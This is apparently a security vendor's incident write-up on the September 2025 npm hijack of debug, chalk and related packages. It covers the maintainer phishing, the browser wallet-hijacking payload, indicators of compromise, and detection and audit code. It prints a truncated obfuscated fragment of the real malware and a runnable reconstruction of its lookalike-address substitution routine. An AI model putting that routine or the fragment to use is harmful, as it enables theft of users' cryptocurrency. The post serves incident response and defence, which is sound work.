On September 8, 2025, one of the largest npm supply chain incidents in recent history unfolded. Popular libraries such as debug and chalk, along with 16 other packages from the same maintainer, were hijacked and pushed to npm with malicious code targeting cryptocurrency wallets and blockchain transactions. These packages collectively see billions of weekly downloads, so the compromise was both widespread and extremely dangerous.

Timeline of Events

  • 13:16 UTC: Malicious versions first published to npm.
  • ~15:20 UTC: Community identifies suspicious code and raises alerts on GitHub.
  • Within 2 hours: Maintainers revert to clean versions and unpublish compromised releases.
  • After discovery: npm flags and locks impacted accounts while developers begin auditing dependencies.

Root Cause: The maintainer's npm account was taken over through a phishing email posing as an npm 2FA reset notice, sent from the lookalike domain npmjs.help. The page captured the username, password, and a live TOTP code, which was enough to log in and publish the malicious versions (see "A Phish in the npm Stream" below).

Affected Packages and Versions

The following popular libraries were impacted. If your project uses these, immediately check your lockfiles and deployments:

These versions were live for approximately two hours before clean versions replaced them.

A Phish in the npm Stream

The maintainer confirmed that their npm account was phished through a highly convincing 2FA reset email sent from a fake domain (npmjs.help), a lookalike of the real npmjs.com.

The attacker collected the username, password, and a live TOTP code, then used these to fully take over the account and publish malicious versions of widely used packages like debug and chalk. Note what that implies: a second factor was enabled and did not help. A TOTP code is a secret the user types, so a phishing page that relays it to the real site within its validity window gets a valid session. Phishing-resistant factors such as WebAuthn security keys or passkeys, which npm supports, are bound to the genuine origin and would not have produced a usable credential for npmjs.help.

This single compromise cascaded across the ecosystem in a matter of hours, showing how even one targeted phishing attack can ripple through the entire open-source supply chain.

What the Malware Does

The malicious payload is a browser-only script: it runs when a compromised package ends up in a client-side bundle and executes in a page. It does not touch the operating system or file system of the developer who installed it; its targets are the crypto transactions and web3 API calls made from that page.

Key behaviors include:

  • Wallet Hijacking: Wraps the provider exposed as window.ethereum to intercept calls to wallets like MetaMask and silently redirect outgoing transactions to attacker-controlled addresses, before the wallet shows the user a confirmation.
  • Network Response Manipulation: Overrides fetch and XMLHttpRequest to scan API responses for blockchain addresses, then replaces each one with the attacker address closest to it by Levenshtein distance (a "nearest match"), so the substituted value shares characters with the legitimate one and survives a casual visual check.
  • Multi-Chain Targeting: Supports multiple blockchains, including Ethereum, Bitcoin, Litecoin, Tron, BCH, and Solana.
  • Stealth Features: Uses obfuscation to hide its presence and exposes developer-like controls under a global object named stealthProxyControl.
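To make the "nearest match" step concrete, here is an added example written for this write-up; it is not code from the payload or from the original post. It reimplements the Levenshtein selection the malware uses to choose a replacement, applies it to a constructed API response the way a hooked fetch would, and adds the defensive check an application can run on the addresses it handles. Every address, the sample response, and the function names are this example's own constructions.

```javascript
// Added example for this write-up (not code from the payload or the original post).
// Reconstructs the "nearest match" address substitution described above and pairs
// it with a defensive check. Every address and the sample response are constructed.

const EVM_ADDRESS = /0x[0-9a-fA-F]{40}/g;

// Classic single-row Levenshtein edit distance (insert/delete/substitute cost 1).
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];        // d[i-1][j-1] for the current j
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];   // d[i-1][j]
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Attacker side, as the write-up describes it: pick the pool address that needs the
// fewest edits to become the legitimate one, so the swap survives a glance.
function nearestMatch(target, pool) {
  let best = { address: null, distance: Infinity };
  for (const candidate of pool) {
    const distance = levenshtein(target.toLowerCase(), candidate.toLowerCase());
    if (distance < best.distance) best = { address: candidate, distance };
  }
  return best;
}

// What a hooked fetch/XMLHttpRequest does to a response body before the app sees it.
function rewriteAddresses(body, pool) {
  return body.replace(EVM_ADDRESS, (addr) => nearestMatch(addr, pool).address);
}

// Defender side: an app that knows which address it rendered or intends to pay can
// flag a value that is almost, but not exactly, that address. An exact match is
// fine; a small nonzero distance is the fingerprint of a lookalike substitution.
function looksLikeSubstitution(expected, observed, maxDistance = 8) {
  const d = levenshtein(expected.toLowerCase(), observed.toLowerCase());
  return d > 0 && d <= maxDistance;
}

// Constructed data: a "legitimate" address of all 1s and a two-entry attacker pool.
const LEGIT = "0x" + "1".repeat(40);
const ATTACKER_POOL = ["0x" + "1".repeat(37) + "abc", "0x" + "9".repeat(40)];
const SAMPLE_RESPONSE = JSON.stringify({ invoice: 42, payTo: LEGIT });

const swappedBody = rewriteAddresses(SAMPLE_RESPONSE, ATTACKER_POOL);
const observedAddress = JSON.parse(swappedBody).payTo;
console.log("nearest:", nearestMatch(LEGIT, ATTACKER_POOL));
console.log("swapped body:", swappedBody);
console.log("flagged as substitution:", looksLikeSubstitution(LEGIT, observedAddress));
```

The defensive check only works when the application has an independent copy of the expected address (for example, one rendered from data fetched before the page loaded the compromised bundle, or one the user pasted); it cannot help when the only source of truth is the response the hook already rewrote. With a large attacker pool the nearest entry can be only a few characters away from the original, which is why the page recommends checking full addresses rather than prefixes.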
const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66ea25['push'](_0x66ea25['shift']());}}}(_0x550a,0x1*-0x1d672f+0x15a079+-0x1699a6*-0x1));var neth=0x5c6*0x2+0x23c4+-0x2f50,rund=-0x1*0x2381+-0x5*0x42d+-0xe*-0x407,loval=-0x
// rest of the malware code


The full script can be found here.

Indicators of Compromise (IoCs)

Security teams can use the following to hunt for compromise:

  • Attacker Ethereum address:
    0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976. You can view live activity related to this address on Etherscan.
  • Suspicious global variables and functions:
    • stealthProxyControl
    • runmask
    • newdlocal
    • checkethereumw
  • Ripgrep detection command:
rg -u --max-columns=80 _0x112fa8


This searches for the obfuscator-generated identifier that opens the malicious script. The -u flag tells ripgrep to ignore .gitignore rules, which matters because node_modules and build output are usually ignored and are exactly where the payload would sit; --max-columns=80 keeps the minified lines from flooding the terminal. Run it over built bundles and any assets you serve from a CDN as well as the source tree. A hit is a strong signal, but a clean result only rules out this exact sample: the identifier is whatever the obfuscator happened to generate, so a variant or a re-obfuscated build would not match.

Why This Matters

This attack shows how a single compromised maintainer account can cascade across the ecosystem:

  • These libraries are transitive dependencies, meaning they get bundled into countless projects without direct developer awareness.
  • Even simple utility packages like chalk can become vectors for highly targeted attacks, especially when bundled into browser-facing apps.
  • The malicious versions were live for only two hours, but the sheer scale of npm meant thousands of developers could have installed them.

Steps for Developers

1. Audit Your Dependencies: Check package-lock.json, yarn.lock, or pnpm-lock.yaml for the versions listed above. Look at every installed copy, not just the top-level one: a transitive dependency can carry a compromised version nested under another package even when your direct dependency resolves to a clean one.

2. Search for the Malware in Your Codebase:

rg -u --max-columns=80 _0x112fa8


3. Update to Safe Versions: Pin dependencies to the known-good versions the maintainers published after the compromised releases were unpublished. Use the overrides field in package.json to force transitive copies onto those versions, regenerate the lockfile, and install with npm ci so the lockfile is honored rather than re-resolved.

4. Check for Wallet Exposure: If your app interacts with crypto wallets, rotate keys and alert affected users.

5. Implement Runtime Monitoring: Detect suspicious browser activity like unexpected network rewrites or injected wallet hooks, for example a window.fetch that is no longer native code or the presence of the stealthProxyControl global from the IoC list.
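The following added example, written for this write-up and not code from the original post or from any product, covers step 1 and step 5 together: a lockfile scan that finds every installed copy of a blocklisted package@version, including nested transitive copies, and a runtime audit of the browser globals the payload touches, using the indicator names from the IoC section. Both functions take their input as arguments so they run under Node against the constructed data at the bottom; the blocklist versions and the sample lockfile are placeholders, and the function names are this example's own.

```javascript
// Added example for this write-up (not code from the original post or any product).
// Part 1 scans a package-lock.json for blocklisted versions; part 2 audits a
// window-like object for the hooks and globals described above. Constructed data
// at the bottom stands in for a real lockfile and a real page.

// --- Step 1: find every installed copy of a blocklisted package@version ----------
// package-lock.json v2/v3 records each installed copy, nested ones included, under
// "packages" keyed by its on-disk path, e.g. "node_modules/foo/node_modules/chalk".
function findBlockedPackages(lockfile, blocklist) {
  if (!lockfile.packages) {
    // lockfileVersion 1 uses a nested "dependencies" tree instead; regenerate it
    // with `npm install --package-lock-only` rather than parsing it separately.
    throw new Error('lockfile has no "packages" map (lockfileVersion 1?)');
  }
  const hits = [];
  for (const [path, entry] of Object.entries(lockfile.packages)) {
    if (path === "") continue; // the root project entry
    // Aliased installs carry an explicit name; otherwise derive it from the path,
    // keeping the scope for "@scope/name". "node_modules/" is 13 characters.
    const name = entry.name || path.slice(path.lastIndexOf("node_modules/") + 13);
    const bad = blocklist[name];
    if (bad && bad.includes(entry.version)) hits.push({ path, name, version: entry.version });
  }
  return hits;
}

// --- Step 5: runtime audit of the browser globals the payload touches ------------
// Indicator names from the IoC section above.
const IOC_GLOBALS = ["stealthProxyControl", "runmask", "newdlocal", "checkethereumw"];

// Captured once, as early as possible (ideally from an inline script in <head>),
// because a payload that loads first can replace Function.prototype.toString too.
const nativeToString = Function.prototype.toString;

function isNativeFunction(fn) {
  return typeof fn === "function" && /\{\s*\[native code\]\s*\}$/.test(nativeToString.call(fn));
}

// `win` is the page's window; a plain object stands in for it under Node.
// `originalRequest` is optional: the wallet provider's request function captured at
// startup. A wallet's injected request is JavaScript, not native code, so it can only
// be compared by identity.
function auditWindow(win, originalRequest) {
  const findings = [];
  for (const name of IOC_GLOBALS) {
    if (name in win) findings.push(`global ${name} is defined`);
  }
  if ("fetch" in win && !isNativeFunction(win.fetch)) findings.push("window.fetch is not native code");
  const proto = win.XMLHttpRequest && win.XMLHttpRequest.prototype;
  if (proto) {
    for (const method of ["open", "send"]) {
      if (!isNativeFunction(proto[method])) findings.push(`XMLHttpRequest.prototype.${method} is not native code`);
    }
  }
  if (originalRequest && win.ethereum && win.ethereum.request !== originalRequest) {
    findings.push("window.ethereum.request was replaced after startup");
  }
  return findings;
}

// --- Constructed data -------------------------------------------------------------
// Placeholder versions: substitute the versions from the advisory you are handling.
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/chalk": { version: "0.0.0-example-clean" },
    "node_modules/some-cli/node_modules/chalk": { version: "0.0.0-example-bad" },
    "node_modules/dbg": { name: "debug", version: "0.0.0-example-bad" }, // alias install
  },
};
const SAMPLE_BLOCKLIST = { chalk: ["0.0.0-example-bad"], debug: ["0.0.0-example-bad"] };

// Native functions borrowed from Math stand in for untouched browser built-ins.
const CLEAN_WINDOW = { fetch: Math.max, XMLHttpRequest: { prototype: { open: Math.min, send: Math.abs } } };
const HOOKED_WINDOW = {
  fetch: (...args) => Math.max(...args), // a JavaScript wrapper, as the payload installs
  XMLHttpRequest: { prototype: { open: Math.min, send: function send() {} } },
  stealthProxyControl: {},
};

console.log("lockfile hits:", findBlockedPackages(SAMPLE_LOCKFILE, SAMPLE_BLOCKLIST));
console.log("clean page:", auditWindow(CLEAN_WINDOW));
console.log("hooked page:", auditWindow(HOOKED_WINDOW));
```

The native-code check is a heuristic: a payload that also replaces Function.prototype.toString before the audit captures its reference can make a wrapper look native, and an absent stealthProxyControl only shows that this sample's globals are missing, not that nothing else is hooked. Treat any finding as a reason to pull the bundle and diff it against a build from known-good dependencies.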

How Upwind Protects You


Upwind offers comprehensive protection to guard against threats like this supply chain compromise, including:

  • Advanced dependency scanning to automatically identify and flag vulnerable package versions
  • Continuous monitoring for suspicious behavior, such as hidden wallet hooks or unexpected network rewrites
  • Applied behavioral analytics to uncover obfuscated scripts and unusual client-side activity that might indicate a compromise
  • Risk prioritization to ensure that security teams can focus their attention on the most critical vulnerabilities and attacks.

By combining proactive scanning with real-time detection and intelligent prioritization, Upwind enables organizations to stay ahead of even the fastest-moving supply chain attacks.

For support in identifying compromised packages, reach out to [email protected].